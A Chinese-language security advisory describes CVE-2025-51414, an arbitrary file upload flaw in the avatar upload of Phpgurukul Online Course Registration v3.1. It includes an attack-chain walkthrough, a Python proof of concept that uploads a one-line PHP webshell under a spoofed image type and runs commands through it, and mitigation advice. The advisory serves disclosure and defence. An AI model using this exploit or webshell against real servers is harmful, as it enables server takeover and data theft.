CVE-2025-51414 CVSS 8.8 高危

CVE-2025-51414 Phpgurukul在线课程注册系统任意文件上传漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-51414

漏洞类型

任意文件上传

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Phpgurukul Online Course Registration

漏洞概述

Phpgurukul Online Course Registration v3.1版本被发现存在高危安全漏洞。该漏洞源于/my-profile.php页面的头像上传功能未实施严格的文件类型过滤机制。经认证的攻击者可利用此缺陷上传任意恶意文件，例如PHP Webshell。一旦文件被上传至Web目录，攻击者即可直接访问并执行恶意代码，从而完全控制服务器，造成严重的数据泄露和系统破坏风险。

技术细节

该漏洞属于典型的任意文件上传漏洞。在Phpgurukul Online Course Registration v3.1的实现中，/my-profile.php端点处理用户更新头像的请求时，缺乏对文件后缀名、MIME类型及文件内容的深层校验。尽管前端可能存在JavaScript限制，但攻击者可轻易通过抓包工具（如Burp Suite）绕过。攻击者通过构造HTTP POST请求，将包含恶意PHP代码的文件（如shell.php）上传，并修改Content-Type为image/jpeg以欺骗服务器。由于服务器未对上传文件进行随机重命名或禁止上传目录执行脚本，该文件会被保存在Web可访问目录中。随后，攻击者通过浏览器访问该文件的URL，Web服务器解析器会将文件中的PHP代码作为服务端脚本执行，从而允许攻击者执行任意系统命令，获取服务器最高权限。

攻击链分析

STEP 1

侦察与访问

攻击者识别出目标运行Phpgurukul Online Course Registration v3.1，并注册或登录一个低权限账户（满足PR:L要求）。

STEP 2

构造恶意载荷

攻击者准备一个包含恶意PHP代码的文件（如Webshell），并将其扩展名伪装为图片格式或直接使用.php扩展名。

STEP 3

绕过上传限制

攻击者访问/my-profile.php页面，拦截上传请求，将文件内容替换为恶意代码，并将Content-Type修改为image/jpeg以绕过基础验证。

STEP 4

上传与执行

服务器接收并保存文件到Web目录。攻击者通过浏览器直接访问该文件的路径，触发服务器端解析PHP代码，执行系统命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target.com/my-profile.php"

# Attacker's session cookie (Requires low privilege login)
cookies = {
    "PHPSESSID": "attacker_session_id"
}

# Malicious PHP file content (Webshell)
php_code = "<?php system($_GET['cmd']); ?>"

# Prepare the payload
files = {
    'profile_pic': ('shell.php', php_code, 'image/jpeg')
}

data = {
    'update': 'submit'
}

try:
    # Send POST request to upload the file
    response = requests.post(url, files=files, data=data, cookies=cookies)
    
    if response.status_code == 200:
        print("[+] File uploaded successfully.")
        print("[+] Try accessing the uploaded file at: http://target.com/uploads/shell.php?cmd=whoami")
    else:
        print("[-] Failed to upload file.")
        
except Exception as e:
    print(f"Error: {e}")

影响范围

Phpgurukul Online Course Registration v3.1

防御指南

临时缓解措施

建议管理员立即检查服务器uploads目录是否存在可疑的.php文件并将其删除。在未升级补丁前，可通过修改Web服务器配置（如Nginx/Apache），禁止在用户上传目录执行PHP脚本来临时缓解风险。同时，加强对用户上传功能的权限控制。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表